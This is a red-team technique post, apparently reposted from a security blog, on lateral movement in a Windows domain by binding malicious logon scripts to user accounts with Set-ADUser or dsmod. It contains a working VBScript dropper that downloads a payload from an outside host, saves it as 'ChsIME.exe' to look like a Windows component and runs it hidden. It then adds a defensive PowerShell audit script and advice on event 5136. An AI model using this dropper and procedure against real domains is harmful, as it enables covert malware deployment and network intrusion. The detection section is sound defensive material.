HireHackking

Logon Script Delivery

0x1. Usage scenario

When you already hold domain-controller or Domain Admin level privileges and want to move laterally to a PC in the domain, but the target has its firewall enabled so that lateral movement over 445 or 135 is not possible, you can obtain access to the target host by binding a logon script to the user's account.

0x2. Method

Method 1. PowerShell (built in on Windows Server 2012 and later). Enumerate the current domain users:

Get-ADUser -Filter * -Properties * | sort LastLogonDate | select name,mail,DistinguishedName,LastLogonDate | Export-Csv -Path C:\Users\Public\Documents\user.csv -Encoding utf8

Bind the script to a specified user:

Set-ADUser -Identity zhangsan -ScriptPath "download.vbs"

Unbind:

Set-ADUser -Identity zhangsan -ScriptPath " "

Method 2. Binding with dsmod:

dsmod user -loscr "download.vbs" "CN=john,CN=Users,DC=redteam,DC=com"

Unbind:

dsmod user -loscr "" "CN=john,CN=Users,DC=redteam,DC=com"

Refresh Group Policy:

shell gpupdate /force

VBS content:

strFileURL = "http://192.168.172.129:82/logo.ico"
strHDLocation = "C:\Users\Public\Documents\ChsIME.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1 'adTypeBinary
    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0 'Set the stream position to the start
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    If objFSO.FileExists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing
    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
End If
Set objXMLHTTP = Nothing
strComputer = "."
Set ws = WScript.CreateObject("WScript.Shell")
val = ws.Run("C:\Users\Public\Documents\ChsIME.exe", 0)

Upload the script to the DC under c:\windows\SYSVOL\sysvol\redteam.com\SCRIPTS\, bind it with method 1 or method 2, then refresh Group Policy.
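As the defensive counterpart to the procedure above (an added example, not code from the original post), the PowerShell audit below lists every domain user whose scriptPath attribute is set, resolves the script under the NETLOGON share, hashes it and flags the objects the dropper above relies on. The allowlist, the marker list and the seven-day window are assumptions to adapt to your own environment.

```powershell
# Added example: audit per-user logon-script assignments in Active Directory.
# Assumes the ActiveDirectory module is installed and the caller can read user
# objects and the domain's NETLOGON share. $Approved and $Suspect are constructed.
Import-Module ActiveDirectory

$Domain   = (Get-ADDomain).DNSRoot                 # e.g. redteam.com in the post
$Approved = @('logon.bat', 'mapdrives.vbs')        # constructed allowlist of expected script names
$Suspect  = 'MSXML2.XMLHTTP', 'ADODB.Stream', 'WScript.Shell', '.exe'   # objects used by the dropper

# Users with a non-empty scriptPath. Most environments assign logon scripts via
# GPO rather than per user, so every per-user assignment deserves a look.
$users = Get-ADUser -Filter 'ScriptPath -like "*"' -Properties ScriptPath, whenChanged

foreach ($u in $users) {
    $name = $u.ScriptPath.Trim()
    if (-not $name) { continue }                  # a lone space is the "unbind" value used in the post

    # Relative names resolve under NETLOGON, i.e. SYSVOL\<domain>\SCRIPTS.
    $path = if ([IO.Path]::IsPathRooted($name)) { $name } else { "\\$Domain\NETLOGON\$name" }
    $flags = @()
    if ($Approved -notcontains [IO.Path]::GetFileName($name)) { $flags += 'not-on-allowlist' }

    if (Test-Path -LiteralPath $path) {
        $item = Get-Item -LiteralPath $path
        $hash = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
        $text = Get-Content -LiteralPath $path -Raw -ErrorAction SilentlyContinue
        foreach ($s in $Suspect) {
            if ($text -match [regex]::Escape($s)) { $flags += "contains:$s" }
        }
        if ($item.LastWriteTime -gt (Get-Date).AddDays(-7)) { $flags += 'modified<7d' }
    } else {
        $hash = '(missing)'
        $flags += 'file-missing'                   # attribute points at a script nobody can inspect
    }

    [pscustomobject]@{
        User        = $u.SamAccountName
        ScriptPath  = $name
        Resolved    = $path
        SHA256      = $hash
        AttrChanged = $u.whenChanged
        Flags       = ($flags -join ',')
    }
}
```

To catch a binding as it happens rather than on a schedule, enable Directory Service Changes auditing on the domain controllers and alert on event 5136 where the modified attribute is scriptPath.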



https://www.cnblogs.com/websecyw/p/16657762.html